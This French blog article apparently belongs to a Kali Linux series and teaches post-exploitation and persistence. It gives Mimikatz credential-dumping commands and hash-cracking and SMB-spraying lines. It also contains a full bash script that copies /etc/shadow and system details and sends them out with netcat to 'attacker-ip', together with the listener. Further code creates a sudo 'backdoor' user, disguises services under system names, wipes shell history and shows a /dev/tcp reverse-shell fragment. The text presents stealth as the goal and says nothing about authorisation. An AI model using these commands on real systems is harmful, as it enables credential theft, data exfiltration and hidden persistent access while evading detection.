🛡️ Article 4 — Kali Post-Exploitation & Persistance : l’art du squat numérique

“Ok, t’es dedans. Et maintenant, tu fais quoi ?” — Tous les formateurs en cybersécurité, un jour.

Tu as ouvert une porte. Une faille a parlé. Un shell a répondu. Bravo, tu es passé en mode “admin fantôme”.
Maintenant commence la vraie partie : explorer, extraire, pivoter… et parfois, rester planquĂ©.


đź§ľ Objectifs de la post-exploitation

  1. Maintenir un accès stable et discret.
  2. Élever ses privilèges.
  3. Explorer les ressources.
  4. Extraire les informations sensibles.
  5. Préparer un pivot vers d’autres systèmes.

En gros ? Tu deviens un espion numérique en mission. Le James Bond du shell prompté.


đź§° Les outils stars de la post-exploitation sur Kali

đź§  1. Mimikatz (Windows only, sorry penguin lovers)

Permet d’extraire des mots de passe, tickets Kerberos, hash NTLM, et bien plus.

powershell
privilege::debug
sekurlsa::logonpasswords

À lancer en tant qu’administrateur, sinon c’est “access denied”.

đź§  2. BloodHound (+ neo4j)

Visualisation des relations Active Directory et élévation de privilèges via graphe.

  • SharpHound.exe cĂ´tĂ© victime pour collecter les infos.
  • Visualisation via BloodHound GUI cĂ´tĂ© Kali.
bash
bloodhound

đź§  3. Empire / Powershell-Empire

Framework d’attaque post-exploitation 100% PowerShell.

Parfait pour une persistance Windows discrète avec communication chiffrée.

đź§  4. John The Ripper

Crack de hash offline. Tu as dumpé des hashs ? Tu veux les casser ? Go John.

bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

đź§  5. CrackMapExec

Swiss army knife AD : exécution distante, enumeration SMB, dump, etc.

bash
crackmapexec smb 192.168.1.0/24 -u admin -p 'motdepasse'

🧩 Script de récupération + exfiltration discrète

Un petit script pour faire propre et furtif :

bash
#!/bin/bash

TARGET_DIR="/tmp/dump"
mkdir -p $TARGET_DIR

echo "[+] Dump des infos système..."
hostname > $TARGET_DIR/hostname.txt
whoami > $TARGET_DIR/user.txt
ifconfig > $TARGET_DIR/ip.txt

echo "[+] Dump des mots de passe (hashés)..."
cat /etc/shadow > $TARGET_DIR/shadow_dump.txt 2>/dev/null

echo "[+] Création de l’archive..."
tar czf dump.tar.gz $TARGET_DIR

echo "[+] Envoi via netcat..."
cat dump.tar.gz | nc attacker-ip 4444

Côté Kali, il suffit d’écouter :

bash
nc -lvnp 4444 > dump_received.tar.gz

đź”— Persistance : quelques astuces de squat

  • Ajout d’un nouvel utilisateur avec sudo :
bash
sudo useradd -m backdoor -s /bin/bash
sudo passwd backdoor
sudo usermod -aG sudo backdoor
  • Ajout de clĂ© SSH dans ~/.ssh/authorized_keys
  • Planification via cron (ou schtasks sur Windows)
  • Service dĂ©guisĂ© sous un nom système (svchostd est un grand classique)

đź§Ľ Nettoyage (optionnel, mais classe)

Un vrai pentester laisse parfois des traces volontaires, pour l’analyse. Mais si tu veux rester discret :

bash
history -c && history -w
rm -rf ~/.bash_history

Et surtout, utilise des shells non interactifs (bash -i >& /dev/tcp/…) pour ne rien logguer du tout.


🧯 En résumé

La post-exploitation est une phase critique : c’est lĂ  que tu transformes un accès en prise de contrĂ´le.
Tu ne te contentes pas de rentrer — tu explores, tu prĂ©pares l’étape d’après, et tu t’assures qu’on t’oublie pas trop vite.


Prochain arrĂŞt : Nettoyage, OPSEC et sĂ©curitĂ© de l’attaquant. Parce que Kali, c’est bien… sauf si toi aussi tu te fais pwned.

🛡️ Article 4 — Kali Post-Exploitation & Persistance : l’art du squat numérique
Partager cet article : Twitter LinkedIn WhatsApp

🖋️ Publié sur SecuSlice.com

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Retour en haut